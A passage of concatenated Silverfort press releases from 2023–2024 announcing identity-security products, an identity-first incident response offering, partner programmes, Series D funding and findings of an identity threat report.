security provider, including multiple Fortune 50 companies. Learn more by visiting www. silverfort. com or on LinkedIn.   --- - Published: 2024-09-30 - Modified: 2025-02-26 - URL: https://www.silverfort.com/press-news/silverforts-identity-first-incident-response-solution-dramatically-cuts-investigation-recovery-times-from-weeks-down-to-days/ The new offering already assisted several Fortune 500 companies in recent breaches; complements existing incident response (IR) tools to help teams immediately contain attacks and reduce their blast radius Boston, Mass. — September 30, 2024 — Silverfort, the leading unified identity security company, announced its Identity-First Incident Response solution, accelerating attack remediation times by complementing existing incident response (IR) tools and optimizing IR processes. Silverfort has the only solution that flips the script on conventional IR playbooks, enabling IR teams to start their investigation by discovering and locking down compromised accounts first, then move on to identify infected machines and malicious network traffic. With this approach, security teams can save valuable time—in some cases, days and nights of non-stop work.   A traditional incident response process starts by searching for infected machines or monitoring network logs to spot anomalous traffic. Pinpointing stolen identities—human users or non-human identities (NHI)—is usually the last piece in the puzzle, giving malicious actors the time and space to continue propagating inside a network during an investigation. In fact, the number of days to identify and contain breaches involving stolen credentials can take upwards of 292 days.   Silverfort Turns the Traditional IR Process Upside Down   For the first time, IR teams can start an investigation by identifying and containing compromised accounts, effectively freezing malicious activity. Using a combination of machine learning (ML) and artificial intelligence (AI), IR practitioners have access to highly actionable telemetry providing the evidence of what accounts and users need to be blocked, and what accounts can remain operational while they run down the source of an incident. “Responding to large incidents where lateral movement has taken place, can be difficult to identify the impacted assets. Often, practitioners have to make difficult decisions with incomplete information when deploying containment actions, balancing attacker damage against business disruption. Having the ability to immediately challenge all authentication events while still allowing business operations to continue is like a surgeon having the ability to slow a patient’s heartbeat in order to perform surgery. You can effectively put an entire company ‘under,’ without stopping productivity, while you investigate the source of the issue,” said Eric Haller, Silverfort Advisor and former VP of Sec Ops & GRC at Palo Alto Networks. “With Silverfort, teams have a partner who gives them actionable telemetry about what needs to be contained so they can keep their businesses operational—and not kill productivity—while they investigate and figure out the best path towards recovery and remediation. ”  Identity-First Approach Stops Threat Actors in their Tracks   Silverfort's Identity-First IR Solution brings identity to the forefront, freezing stolen accounts and stopping lateral movement to reduce the impact of an incident and accelerate remediation time. It can be rapidly deployed mid-breach (within less than 12 hours for an organization with 50,000 users, as demonstrated recently) to detect and contain compromised accounts and identify which systems, users, or other assets within the environment have been compromised. An identity-first approach to incident response relieves the burden of sifting through logs and network activity to identify compromised users and makes the overall IR process more efficient. "Incident response is a race against the clock. In today's rapidly changing threat landscape and sophisticated AI-backed threat actors, security teams can't afford to be hunting for an anomaly when potential attacks occur or systems go down," said Ron Rasin, Chief Strategy Officer at Silverfort. "While there's an established IR playbook to handle malware and network aspects of cyberattacks, the identity aspect is still a challenge. Silverfort's IR solution complements existing tools by instantly blocking compromised identities and adjacent machines and offering immediate visibility into those machines. We stanch the bleeding to ensure a safe recovery. "  Instantly Activate an “Authentication Firewall” for Domain Controllers for IAM Infrastructure  Silverfort integrates with an existing IR strategy in a crisis scenario and is the only identity security platform that can activate a firewall for the identity infrastructure, including Active Directory Domain Controllers. Once deployed, Silverfort identifies compromised user accounts and can activate its Authentication Firewall to block and contain the breach. Essentially, the Authentication Firewall acts as a freeze button or "kill switch," analyzing every authentication and access attempt and denying requests to critical resources until IR teams have the upper hand. Silverfort will broadly deploy multi-factor authentication (MFA) to every identity and resource, and configure "block access" policies for suspected user accounts or groups. Once these policies are activated, any additional malicious authentication attempts will be blocked. Silverfort has proven this approach can reduce remediation times to days rather than weeks, and dramatically reduce the potential damage from a breach.   “Silverfort immediately helped in the mitigation of compromised users, and was key in tracking down compromised identities as we brought our Domain Controllers back online,” said an identity leader from an Fortune 100 financial services company that recently went through a breach. “We worked quickly with the IR team to immediately put blocking policies in place for the compromised identities. ”  Key benefits of Silverfort's Identity-First Incident Response Solution include: Block a compromised user account in real time: Trigger MFA or block access instantly to stop an attack as it happens, providing security teams with actionable forensic data. Automatically flag risky users and computers: Investigate threats and gain visibility into what compromised users did. Easily cruise through different compromised computers and users in the environment to get a clear picture of what’s been compromised. Instantly deny access to any machine or resource: With Silverfort's Authentication Firewall, IR teams can automatically restrict access to limit an incident's blast radius. Highest-precision risk analysis and MFA verification: Analyze every login based on the full users' authentication trail and verify detected threats with MFA to reduce false positives and unburden security teams. Seamlessly integrate with existing Security Operations Infrastructure: Incorporate identity protection measures (e. g. , MFA, service account protection, access block) into an existing SOAR automated playbook. Provide XDR with identity-related threat signals and suspected attacks. Ingest endpoint, network, and other telemetries to enrich context and refine the precision of detected threats. Exchange data with the SIEM for mutual correlation of risk signals, optimizing and enhancing insights into each user account's exposure to compromise or involvement in an active attack. Comprehensive coverage of the hybrid environment: Every authentication and access attempt—whether by a human or NHI—is monitored, on-prem or in the cloud. Silverfort has spent years purposely designing its platform to eliminate the silos and blind spots that plague an organization's identity infrastructure, which no other solution has managed to address so far. The platform extends modern identity security measures to every enterprise resource, on-prem, in the cloud, human or NHI, providing a unified identity security layer that works effortlessly and instantly. By holistically enabling these modern identity security controls, even for previously unprotectable assets, customers can stop the most dangerous identity-based attacks, quickly comply with strict regulations, and meet their cyber insurance requirements.   Learn more about Silverfort's Unified Identity Security Platform and download our Identity Incident Response Playbook.   About Silverfort  Silverfort, the Unified Identity Security company, pioneered the first and only platform that enables modern identity security everywhere. We connect to all the silos of the enterprise identity infrastructure to create a single, unified identity security layer across all on-prem and cloud environments. Our unique architecture and vendor-agnostic approach take away the complexity of securing identities and extend protection to resources that cannot be protected by any other solution, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure, and more. Silverfort is a top-tier Microsoft partner and was selected as Microsoft's Zero Trust Champion of the Year. Hundreds of the world's leading enterprises trust Silverfort to be their identity security provider, including multiple Fortune 50 companies. Learn more by visiting www. silverfort. com or on LinkedIn.   --- - Published: 2024-07-23 - Modified: 2024-07-23 - URL: https://www.silverfort.com/press-news/silverfort-expands-operations-to-india-and-south-asia-bringing-a-universal-approach-to-identity-security-to-the-region/ An expansive partner network across the SAARC market ensures every business across the region will have access to a universal identity security platform that discovers and protects human and non-human identities across cloud and on-prem environments  Bangalore, India – July 23, 2024 – Today, Silverfort, the leading identity company, announced that it is expanding its global operations to bring its Unified Identity Security Platform to India and neighboring South Asian countries. After seeing customer growth and success in the Australian and Singapore markets, Silverfort expanded its Global Partner Program to meet the growing need for a unified identity protection framework in the various Indian states and territories. "Innovation and productivity are byproducts of the shift to the cloud, but so are complexity and increased identity risks. Identity teams need a solution that unifies identity security into a single solution that simultaneously encourages productivity and enhances security,” said Stuart Wilson, VP of Sales, APAC at Silverfort. “We’ve seen huge demand for Silverfort’s solutions across South Asia and India. With boots on the ground, and by growing our partner network in this region, we’ll be able to meet customers where they are and help organizations build more resilient cybersecurity programs. ” Identity security is one of the most significant challenges security and IT leaders face today. Most enterprises use a combination of an on-prem identity management tool (i. e. , Active Directory) and a mix of several cloud identity providers (IdPs) to manage and secure identities. But each tool operates in a silo, leaving gaps and blind spots that resulted in a striking 83% of organizations reporting identity-related data breaches. A universal and unified approach to identity security is no longer a nice-to-have but a must-have for organizations looking for more resilient and scalable identity security programs. That’s why Silverfort moved to a 100% channel business and continuously partners with organizations that are hyper-focused on offering customers visibility and protection for all their identities, whether on-prem, in the cloud, human or non-human. Identity is often a shared responsibility across multiple departments with different goals. Already overworked and understaffed, identity and security teams are stuck using a patchwork network of tools to manage and secure identity across complex hybrid environments, many applications, and thousands of people. Silverfort's Unified Identity Security Platform protects every identity in an environment, including those that previously went unprotected. Designed not to interrupt a business's daily operations or disrupt day-to-day users, Silverfort extends protection to critical resources such as non-human identities, command-line tools, and OT infrastructure. Unlike other vendors, it's easy to deploy, proxyless, and can secure identities in the cloud or on-prem. Silverfort breaks down identity barriers and silos, providing a unified identity security layer that helps organizations keep pace with today’s complex threat environment. Silverfort’s Unified Identity Security Platform: Discovers, protects and monitors service accounts (non-human identities) without modifying them Extends existing MFA solution to ‘unprotectable’ systems (legacy applications, command-line interfaces, OT systems, File Share, etc. ) Connects legacy applications into modern cloud IAM (including Azure AD Conditional Access) Detects and responds to identity-based attacks in real time, including account takeover, ransomware propagation, and lateral movement To lead the go-to-market for India and the SAARC region, Silverfort has appointed Abhinav Gupta as the regional lead to drive local business, given his extensive experience in IT and cybersecurity. As an IIM alumnus and in his previous roles with global cybersecurity brands, Gupta shall work closely with Indian enterprises to expand awareness about identity security and drive Silverfort's mission. To learn more about Silverfort and its products, visit www. silverfort. com. About Silverfort Silverfort, the Unified Identity Security company, pioneered the first and only platform that enables modern identity security everywhere. We connect to all the silos of the enterprise identity infrastructure to create a single, unified identity security layer across all on-prem and cloud environments. Our unique architecture and vendor-agnostic approach take away the complexity of securing identities and extend protection to resources that cannot be protected by any other solution, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure and more. Silverfort is a top-tier Microsoft partner and was selected as Microsoft’s Zero Trust Champion of the Year. Hundreds of the world’s leading enterprises trust Silverfort to be their identity security provider, including multiple Fortune 50 companies. Learn more by visiting www. silverfort. com or on LinkedIn.   --- - Published: 2024-06-12 - Modified: 2024-06-13 - URL: https://www.silverfort.com/press-news/silverfort-launches-the-identity-security-alliance/ Dozens of companies, Microsoft, Okta, Ping Identity, Splunk, Wiz and others, partner to help customers overcome the challenges of securing today’s highly fragmented IAM landscape Boston, MA, and Tel Aviv, Israel – June 12, 2024 – Today, Silverfort is unveiling its Identity Security Alliance (ISA), to offer partners and customers a comprehensive, 360-degree view of the Identity and Access Management (IAM) landscape, user activity and security threats across all environments, ranging from legacy on-prem Active Directory (AD) to modern cloud-native identity infrastructure. By integrating with Silverfort, partners empower their customers to detect, investigate, and respond faster to identity-based attacks wherever they may occur. Over the recent years, the enterprise identity infrastructure has grown increasingly complex and fragmented. More than 90% of enterprises still use Active Directory (AD) to manage on-prem workforce identities, alongside a mix of one or more cloud identity providers (IdPs), and other point solutions like PAM, IGA, MFA, ITDR, amongst others. However, these points solutions operate in silos, leaving gaps and blind spots that resulted in a striking 83% of organizations reporting identity-related data breaches. Adding to the complexity, organizations face challenges in extracting identity intelligence from AD and correlating that data with their cloud identity infrastructure and various security products. With AD often being the "keys to the castle," so to speak, it's a prime target for malicious actors who frequently use it as a point of entry, to infiltrate the cloud infrastructure too. Recent Silverfort research found that 67% of organizations sync their on-prem AD passwords to their cloud identity providers in an insecure manner, which increases their attack surface. As a result, many threat actors such as Alphv/BlackCat and Scattered Spider take advantage of AD as a stepping stone for spreading into the cloud identity infrastructure too. “As the leader in Security Hyperautomation, we understand how critical it is for security and enterprise systems to work together,” said Eldad Livini, Chief Innovation Officer at Torq. “With the launch of Silverfort’s Identity Security Alliance, we are excited to participate in creating an ecosystem to secure one of the enterprise’s most important and targeted assets: their Identity Infrastructure. ” Silverfort's partner ecosystem removes identity silos, giving security and IT teams a unified discovery and visibility into the hybrid identity infrastructure, from on-prem AD to cloud-native Identity Providers (IdPs), and all related security threats. Silverfort ISA partners can now extract identity intelligence from all the different corners of the identity infrastructure, and feed it into other technology and security solutions in their stack, providing the missing pieces in the puzzle for a complete picture of the identity attack surface. Built on modern APIs, Silverfort partners can easily deploy and maintain the integrations. Partners will also enjoy access to Silverfort's growing customer base and joint activities to benefit the identity security community. "Collaboration and innovation are the driving forces behind cybersecurity, which is why Microsoft is incredibly excited about its continued collaboration with Silverfort and its Identity Security Alliance," said Maria Thomson, Director of Microsoft Intelligent Security Association. "Together, we have made significant progress in advancing identity protection and security, and we can't wait to see what more we can achieve together. " "Security is a team sport and requires deep technical partnerships with other vendors in a company's tech stack," said Ben Goodman, VP of Strategic Alliances and Corporate Development at Silverfort. "To successfully understand the risks your organization is up against, you have to extract data out of silos and correlate it to make it actionable. Identity information is a crux for hybrid cloud organizations today, and getting full visibility into the identity threat landscape is a huge need for our customers. Silverfort’s Identity Security Alliance will help close the gap and provide better visibility for our customers. " Joint Customer Benefits of Silverfort’s ISA include: Better interoperability between their different identity and security products, many of which previously operating as silos. This includes pre-built integrations that are regularly maintained, which lower implementation, support and operational costs. Deep unified visibility into the hybrid identity infrastructure, including identity threats hiding on-prem or in the cloud, with actionable reports and alerts. Extended real-time protection against identity threats across all identity silos, including AD and cloud infrastructure, for both human and non-human identities (NHI). Joint activities, content and research for the identity security community. Together with our partners, and thanks to their combined strengths, customers can extend and consolidate their identity security, accelerate cloud migration, achieve compliance with regulations and cyber insurance requirements, and effectively prevent data breaches. Silverfort partners include organizations of all sizes, including Microsoft, Okta, Ping Identity, Palo Alto Networks, Splunk, Torq, Wiz, Axonius, SGNL, Red Access, Checkpoint, Entro Security, Apono, HYPR, Valence Security, Yubico, Veza, RSA, Infinipoint, StrongDM. Learn more about joining Silverfort's Identity Security Alliance here. About Silverfort Silverfort, the Unified Identity Security company, pioneered the first and only platform that enables modern identity security everywhere. We connect to all the silos of the enterprise identity infrastructure to create a single, unified identity security layer across all on-prem and cloud environments. Our unique architecture and vendor-agnostic approach take away the complexity of securing identities and extend protection to resources that cannot be protected by any other solution, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure and more. Silverfort is a top-tier Microsoft partner and was selected as Microsoft's Zero Trust Champion of the Year. Hundreds of the world's leading enterprises trust Silverfort to be their identity security provider, including multiple Fortune 50 companies. Learn more by visiting www. silverfort. com or on LinkedIn. Contact: Silverfort@inkhouse. com --- - Published: 2024-05-22 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-unveils-global-partner-program-to-meet-growing-demand-for-unified-identity-protection/ Channel industry veteran Leslie Bois leads the company toward its 100% channel-focused business strategy Tel Aviv, Israel & Boston – May 22, 2024 — Silverfort, the leading identity protection company, announced its comprehensive Unified Partner Program to enable its global channel and cyber insurance partners to create the ultimate identity protection framework. This news comes on the heels of Silverfort’s recent $116M Series D funding, led by Brighton Park Capital. The new funds will help Silverfort expand its platform with new innovative product modules and accelerate its go-to-market strategy with an emphasis on channel partnerships. Identity has become the weakest link in enterprise security, and solving it requires a new, holistic approach—a unified, end-to-end layer of security that covers all the silos and blind spots of the identity infrastructure. With 80% of organizations having experienced an identity-related breach and compromised credentials being the #1 tactic used by threat actors and ransomware campaigns, Silverfort equips enterprises with a way to easily visualize, detect, prevent, and respond to identity-based attacks. “Identity is becoming the last line of defense in cybersecurity—and is currently the most exposed attack surface,” said Silverfort’s Vice President of Global Channels, Leslie Bois. “Defending against today’s threats requires a holistic security approach that covers the entire identity infrastructure, both on-prem and in the cloud, with a unified platform. We believe the best way to help organizations achieve that is with our mutual partners. That’s why Silverfort is moving fast towards a 100% channel business and seeing amazing momentum as a result. ” “Partnering with Silverfort has enabled Alchemy to extend identity and access protection beyond the traditional limitations,” said JJ Savarino, vice president of marketing and vendor management at Alchemy Technology Group. “Together, we can now offer identity security to all sensitive resources. Because Alchemy takes an identity-centric approach to cybersecurity, Silverfort has become critical to the comprehensive security strategies we build for clients. ” Silverfort spent years researching and designing its platform to enable modern identity security controls everywhere and eliminate the silos and blind spots that identity security suffers from. Since bringing Bois on board in early 2023 to lead global channel sales, Silverfort has become a 100% channel-first organization. Silverfort, with the help of its partners, is hyper-focused on offering customers visibility and protection for all their identities, whether they are on-prem, in the cloud, human, or machine—including systems that no other solution can protect. Due to Silverfort’s customer-first mindset, partnering with organizations with deep expertise in identity was the ideal strategy. Since the decision to make the company’s business 100% channel-based, revenues have been growing rapidly—more than 100% year-over-year—with more than 90% of the revenues going through its channel program, and in some regions, 100%.  Key benefits of Silverfort’s Partner Program include: Seamless integration with other products in the partner’s portfolio: While traditional MFA and IAM solutions fail to deliver the 360-degree protection organizations need in their complex hybrid environments, Silverfort can extend the coverage of any other identity product to all resources, including ones that couldn’t be protected before, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure, and many more. This allows partners to show far greater value to their customers by combining Silverfort with other products to deliver a comprehensive offering. Access to comprehensive training: This year, partners can benefit from training, accreditations, and knowledge support to increase their technical, deployment, and service expertise. The easy-to-use Silverfort Academy portal empowers Silverfort’s partners to deepen their knowledge of Silverfort’s products and identity security in general and enables them to offer additional services and better manage and support their customers. Compliance support: Enable customers to comply with Cyber Insurance requirements and various regulatory frameworks, such as the UK’s Civil Aviation Authority Requirements and the NY-DFS and PCI-DSS regulations. Silverfort’s solution also supports President Biden’s 2021 Executive Order on Cybersecurity, which requires risk-based authentication and Zero Trust security. “With the uptick of identity-based attacks, cybersecurity leaders are asking us for identity security solutions,” said Jeremy Pierson, cybersecurity program architect at CompuNet. “Thanks to our partnership with Silverfort, CompuNet has been able to help secure our customers’ identity infrastructure effectively and expediently. ” Silverfort offers three different levels in its partner program that give partners additional benefits and support to help accelerate their business and grow together. Those benefits include significant discounts, enablement, joint marketing, and more. Similarly, Silverfort offers support and incentives to cyber insurance partners based on their business model: reselling Silverfort’s product, getting referral incentives (for the partner or the end customer), or simply recommending Silverfort’s solution. Silverfort is dedicated to protecting all identities from a single unified platform, eliminating the need for point identity security solutions that operate as silos. ’ Eighty-two percent of businesses have hybrid environments consisting of both on-prem and cloud-based identity infrastructure, which results in identity sprawl and ineffective security. Silverfort breaks down identity barriers and silos, providing a unified identity security layer that works holistically across both cloud and on-prem environments. Learn more about Silverfort’s Unified Partner Program here. ### About Silverfort Silverfort, the Unified Identity Protection company, pioneered the first and only platform that enables modern identity security everywhere. We deliver a unified layer of security across all the silos of enterprise identity infrastructure, both on-prem and cloud. Our unique architecture and vendor agnostic approach, take away the complexity of securing identities across the various systems and environments, and extend protection to resources that cannot be protected by any other solution, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure, and many more. Silverfort is a top-tier Microsoft partner and was selected as Microsoft's Zero Trust Champion of the Year. Hundreds of the world's leading enterprises trust Silverfort to be their identity security provider, including multiple Fortune 50 companies. Learn more by visiting www. silverfort. com or on LinkedIn. --- - Published: 2024-03-26 - Modified: 2024-09-10 - URL: https://www.silverfort.com/press-news/silverfort-research-finds-two-thirds-of-businesses-sync-on-prem-passwords-to-cloud-environments/ Company Unveils its Proprietary Identity Underground Report 2024; First Identity Report 100% Dedicated to Exposing Frequency & Prevalence of Identity Threat Exposures (ITEs) Alphv BlackCat and Lockbit ransomware threat actors abuse gaps in identity to steal credentials, escalate privileges, and move through organizations undetected Tel Aviv, Israel & Boston, MA, March 26, 2024 – Today, Silverfort, the Unified Identity Protection Company, unveiled its Identity Underground Report, highlighting the frequency of identity security gaps that lead to successful attacks on organizations across every industry and region. Fueled by Silverfort's proprietary data, the report is the first of its kind, focusing on identity as an attack vector and offering insights into the Identity Threat Exposures (ITEs) that pave the way for cyberattacks. The data, analysis, and insights help identity and security teams benchmark their security programs, empowering them to make informed decisions on where to invest in identity security.   The standout – and alarming – finding is that two out of every three businesses (67%) routinely synchronize most of their users’ passwords from their on-premises directories to their cloud counterparts. This practice inadvertently migrates on-prem identity weaknesses to the cloud, which poses substantial security risks by creating a gateway for attackers to hack these environments from on-prem settings. The Alphv BlackCat ransomware group is known to use Active Directory as a stepping stone to compromise cloud identity providers. Over the past decade, there has been a rush to migrate to the cloud – and for a good reason. Simultaneously, however, security gaps stemming from legacy infrastructure, misconfigurations, and insecure built-in features create pathways for attackers to access the cloud, significantly weakening a company's resilience to identity threats. "Identity is the elephant in the room. We know that identity plays a key role in nearly every cyberattack. Lockbit, BlackCat, TA577, Fancy Bear – they all use identity gaps to break in, move laterally, and gain more permissions," said Hed Kovetz, CEO and Co-founder of Silverfort. "But we need to know how common each identity security gap is so we can start methodically fixing them. Finally, we have concrete evidence outlining the frequency of identity gaps, which we can now classify as Password Exposers, Lateral Movers, or Privilege Escalators, and they’re all vehicles for threat actors to complete their attacks. We hope that by shining a light on the prevalence of these issues, identity and security teams will have the hard numbers they need to prioritize adequate security investments and eliminate these blind spots. ” Key findings include: Two-thirds of all user accounts authenticate via the weakly encrypted NTLM protocol, providing attackers easy access to cleartext passwords. Easily cracked with brute-force attacks, NT Lan Manager (NTLM) authentication is a prime target for attackers looking to steal credentials and move deeper into an environment. Recent research from Proofpoint security shows threat actor TA577 using NTLM authentication information to steal passwords. A single misconfiguration in an Active Directory account spawns 109 new shadow admins on average. Shadow admins are user accounts with the power to reset passwords or manipulate accounts in other ways. Attackers use shadow admins to change settings and permissions and gain more access to machines as they move deeper into an environment.   7% of user accounts inadvertently hold admin-level access privileges, giving attackers more opportunities to escalate privileges and move throughout environments undetected. 31% of user accounts are service accounts. Service accounts are used for machine-to-machine communication and have a high level of access and privileges. Attackers target service accounts as security teams often overlook them. Only 20% of companies are highly confident that they have visibility into every service account and can protect them. 13% of user accounts are categorized as "stale accounts," which are effectively dormant user accounts that the IT team may have forgotten. They are easy targets for lateral movement and evading detection by attackers. Silverfort's research team has meticulously categorized Identity Threat Exposures (ITE) into four distinct classes. Their goal is to arm the cybersecurity industry with a framework to classify and understand the diverse spectrum of identity issues and misconfigurations that enable credential theft, privilege escalation, and lateral movement by malicious actors. The four ITE categories Password Exposers: Enable an attacker to discover users’ passwords by exposing the password hash to common compromise techniques. Examples include NTLM authentication, NTLMv1 authentication, and admins with SPN. Privilege Escalators: Allow an attacker to gain additional access privileges. Typically Privilege Escalators are the result of a misconfiguration or insecure legacy settings. Examples include shadow admins and unconstrained delegation. Lateral Movers: Allow an attacker to move laterally undetected. Examples include service accounts and prolific users. Protection Dodgers: Potentially open legitimate user accounts up for attackers to use. Protection Dodgers stem from human error or mismanaged user accounts; they are not inherently security flaws or misconfigurations. Examples include new users, shared accounts, and stale users. Join Silverfort’s identity threat experts on April 9th in partnership with Hacker News for a deep dive into the report findings. Visit Identity Underground to access the complete report. About Silverfort Silverfort, the Unified Identity Protection company, pioneered the first and only platform that enables modern identity security everywhere. We connect the silos of enterprise identity infrastructure to unify identity security across all on-prem and the cloud environments. Our unique architecture and vendor agnostic approach, takes away the complexity of securing every identity, and extends protection to resources that cannot be protected by any other solution, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure, amongst others. Silverfort is a top-tier Microsoft partner and was selected as Microsoft's Zero Trust Champion of the Year. Hundreds of the world's leading enterprises trust Silverfort to be their identity security provider, including multiple Fortune 50 companies. Learn more by visiting www. silverfort. com or on LinkedIn. --- - Published: 2024-01-23 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-raises-116m-to-deliver-a-unified-layer-of-identity-security-across-all-enterprise-resources/ Following 100%+ year-over-year revenue growth, with 100+ customers added quarterly, including multiple Fortune 50 companies, Silverfort announces Series D funding, led by Brighton Park Capital January 23, 2024 – Tel Aviv, Israel & Boston, MA – Silverfort, the leading identity protection company, today celebrates raising $116M in series D funding, bringing the total amount raised to $222M. Brighton Park Capital (BPC) led the round, with participation from existing investors including Acrew Capital, Greenfield Partners, Citi Ventures, General Motors Ventures, Maor Investments, Vintage Investment Partners and Singtel Innov8. Mike Gregoire, founding Partner at BPC and former CEO of CA Technologies and Taleo, will join Silverfort's Board of Directors as the company scales and continues its journey to transform and lead the identity security market. 100%+ Year-Over-Year Growth, At Scale The investment follows another record year of more than 100% growth where Silverfort added tens of millions in new Annual Recurring Revenue (ARR), and hundreds of new enterprise customers, including the largest global financial services, manufacturing and retail companies. Ranked as the #1 Best Startup Company to Work For in Israel for the second consecutive year, Silverfort intends to grow its global team, already located across more than 15 countries, and will use the additional funds to expand its platform with new innovative product modules and accelerate its go-to-market strategy with an emphasis on channel partnerships. Identity Is Every Attacker’s Weapon of Choice – And There’s a Reason Compromised identities and credentials are the #1 tactic for cyber threat actors and ransomware campaigns to not only break into organizational networks, but to spread inside networks. A core reason identity is the most vulnerable element in the enterprise attack surface, is the market misperception that Identity and Access Management (IAM) providers—who are in charge of managing identities—are capable of securing identities. In reality, they are not in a position to secure identity effectively, due to two major limitations: The migration to hybrid and multi-cloud environments resulted in fragmented, complex enterprise environments: 92% of companies are forced to use a combination of cloud-native and on-prem identity solutions, often from multiple vendors. Each of these solutions operates as a ‘silo’, with its own local security controls, without understanding the broader context of the user’s activity and without any consistent enforcement across the organization. Many critical resources found at every company cannot be protected by IAM and identity security solutions. Resources such as command-line interfaces (used in most data breaches), legacy systems, service accounts (non-human identities), file shares and databases, IT/OT infrastructure, amongst others, are regularly used by attackers as the easiest way to access sensitive networks and avoid the existing security controls. Where No Identity Security Platform Has Gone Before Silverfort spent years purposely designing its platform to eliminate the silos and blind spots that identity security suffered from for many years, which no other solution has managed to address so far. The platform extends modern identity security measures to every enterprise resource, on-prem and in the cloud, including systems that no other solution can protect, in an effortless and instant manner. It enables Multi-Factor Authentication (MFA), Identity Threat Detection and Response (ITDR), Identity Security Posture Management (ISPM), and real-time protection for privileged users and service accounts —an attacker’s prime target. By enabling these modern identity security controls holistically, even for previously unprotectable assets, customers are able to stop identity-based attacks everywhere (including by some of today’s most dangerous threat actors) and comply with regulations and cyber insurance requirements. "Silverfort is one of the rare companies that has successfully envisioned how a large market will need to transform to solve a tough problem – in this case, identity security," said Mike Gregoire. "The company has a track record of building innovative products at scale that exceed customer expectations, combined with excellent go-to-market execution. Silverfort’s deep market expertise and vision for the identity security market, as well as their ability to build a winning team and culture, are second to none. We’re thrilled to join Hed, Yaron, and the rest of the Silverfort team on the next phase of their journey to not only reshape the identity security market but lead it. ” Enabling Modern Security on Top of Every Authentication With its patented technology, Silverfort connects to the entirety of an organization’s identity infrastructure in a matter of hours, from cloud-native identity providers (which are only aware of what happens inside their specific silo) to legacy on-prem directories such as Active Directory (which are missing basic security capabilities). Silverfort’s unique platform architecture: Serves as a centralized enforcement engine behind all identity infrastructure silos, and as a ‘second opinion’ behind-the-scenes to approve all access requests. Maps the company’s entire identity infrastructure, analyzes its security posture, inspects every access attempt across all environments in real-time, and most importantly – enforces active inline policies to verify the user’s identity or to prevent unauthorized access. Operates in a way that is completely invisible to the countless devices, servers and applications that it protects, eliminating the need to modify them, integrate with them, or install anything on them. Organizations can protect every type of system, saving enormous time and cost. “Identity has become the weakest link in enterprise security, and solving it requires a new approach – a unified, end-to-end layer of security that covers all the silos and blind spots of the identity infrastructure,” said Hed Kovetz, Silverfort’s Co-Founder and CEO. “We are very excited about our new partnership with BPC, which will allow us to accelerate our platform vision and strong business momentum. We look forward to reshaping the way identity security is done in every company, to effectively answer today’s and tomorrow’s cyber threats. ” Learn more about how Silverfort helps businesses protect identities with its unified identity protection platform. About Silverfort Silverfort is the Unified Identity Protection company that pioneered the first and only platform, enabling modern identity security everywhere. By connecting to the silos of the enterprise identity infrastructure, Silverfort unifies identity security across all on-prem and the cloud environments. With its unique architecture and vendor agnostic approach, Silverfort takes away the complexity of securing every identity, and extends protection to resources that cannot be protected by any other solution, such as legacy systems, command-line interfaces, service accounts (non-human identities), IT/OT infrastructure, amongst others. Silverfort is a Top Tier Microsoft partner and was selected as Microsoft's Zero Trust Champion of the Year. It’s trusted by hundreds of the world's leading enterprises, including multiple Fortune 50 companies, and has local teams in more than 15 countries. Learn more by visiting www. silverfort. com. About Brighton Park Capital Brighton Park Capital is a Greenwich, Conn. -based investment firm focused on entrepreneur-led, growth-stage software, healthcare, and tech-enabled services companies. The firm invests in companies that provide highly innovative solutions in partnership with great management teams. Brighton Park brings purpose-built value-add capabilities that match the unique requirements of each of its companies. For more information about Brighton Park Capital, please visit www. bpc. com. Media Contacts For SilverfortJill CreelmanSilverfort@inkhouse. com For Brighton Park CapitalJenny Gore/Julie RudnickFGS GlobalBrightonPark@fgsglobal. com --- - Published: 2023-12-19 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-first-to-deliver-automated-identity-protection-of-thousands-of-service-accounts-with-a-single-click-securing-machine-to-machine-communications/ Customers can now discover, monitor, and protect their service accounts with fully automated visibility, risk analysis, and adaptive access policies to bolster the protection of an entire class of identities that previously went unprotected. Tel Aviv & Boston - Dec 18, 2023 — Silverfort, the Unified Identity Protection leader, announced today the first and only solution that provides customers with real-time protection and visibility of service accounts in a single click. Silverfort’s expanded Service Account Protection capabilities automate and scale the protection of thousands of service accounts with ease, removing burdensome roll-out processes to save time and cost. This solves a major blind spot in enterprise security that was, until now, extremely difficult to address, enabling organizations to mature their overall security program. Service accounts are used for machine-to-machine communication to perform automatic, repetitive, and scheduled actions in the background, usually without administrator supervision or intervention. Because there is no human attached to a service account, they cannot be protected with standard identity security controls such as Multi-Factor Authentication (MFA). Compounding the risk, service accounts are typically highly privileged accounts, giving access to highly critical systems. Based on a recent report by Osterman research, only 4% of organizations claim to have full visibility into their service accounts. As we rely more and more on automated machine-to-machine communication and process automation, the number of unprotected service accounts continues to climb, giving attackers a bigger attack surface to target. According to Silverfort’s analytics, we’ve found that more than 60% of attacks leverage service accounts for lateral movement. Silverfort’s Service Account Protection fully automates discovery and activity mapping, with newly detected service accounts protected within 30 minutes. Today, the company is adding the ability to dramatically scale protection with a single click and add immediate protection to new service accounts upon creation. Each service account’s activity is mapped, including the sources and destinations where it’s being used, establishing a baseline of normal behavior and to identify the service account's operational dependencies. Policies are auto-created to block access or alert on unauthorized activity. For those needing proof of service account protection for cyber insurance requirements, Silverfort provides detailed reports to help reduce insurance premiums. “Service accounts are a security nightmare because you can’t put MFA on them, so you need to have other means of protection. Silverfort enabled us to put real-time protection on our service accounts by enforcing policies that block any access that deviated from normal behavior,” said Tom Parker, VP of IT and CISO of Kayak. “Because of this, even if attackers were able to compromise the credentials of service accounts, they wouldn’t be able to use them for malicious access. Silverfort was able to protect what no one else could. Of the security tools we use, Silverfort has a very high return on investment. ” Silverfort’s Service Account Protection: Discovers and maps service accounts for complete visibility. Silverfort’s platform data shows that most companies have 30-40% more service accounts than previously thought. Unlike any other identity security solution on the market, Silverfort maps every service account, including ones that the organization didn’t know about, giving teams insight into the risk of every service account’s authentication and access activity. Delivers instant protection. Silverfort auto-generates tailored policies for every service account that triggers a protective action when the service account is being used outside of its intended purpose. Users can choose between blocking access and alerting or activating the policy. New service accounts added will be detected 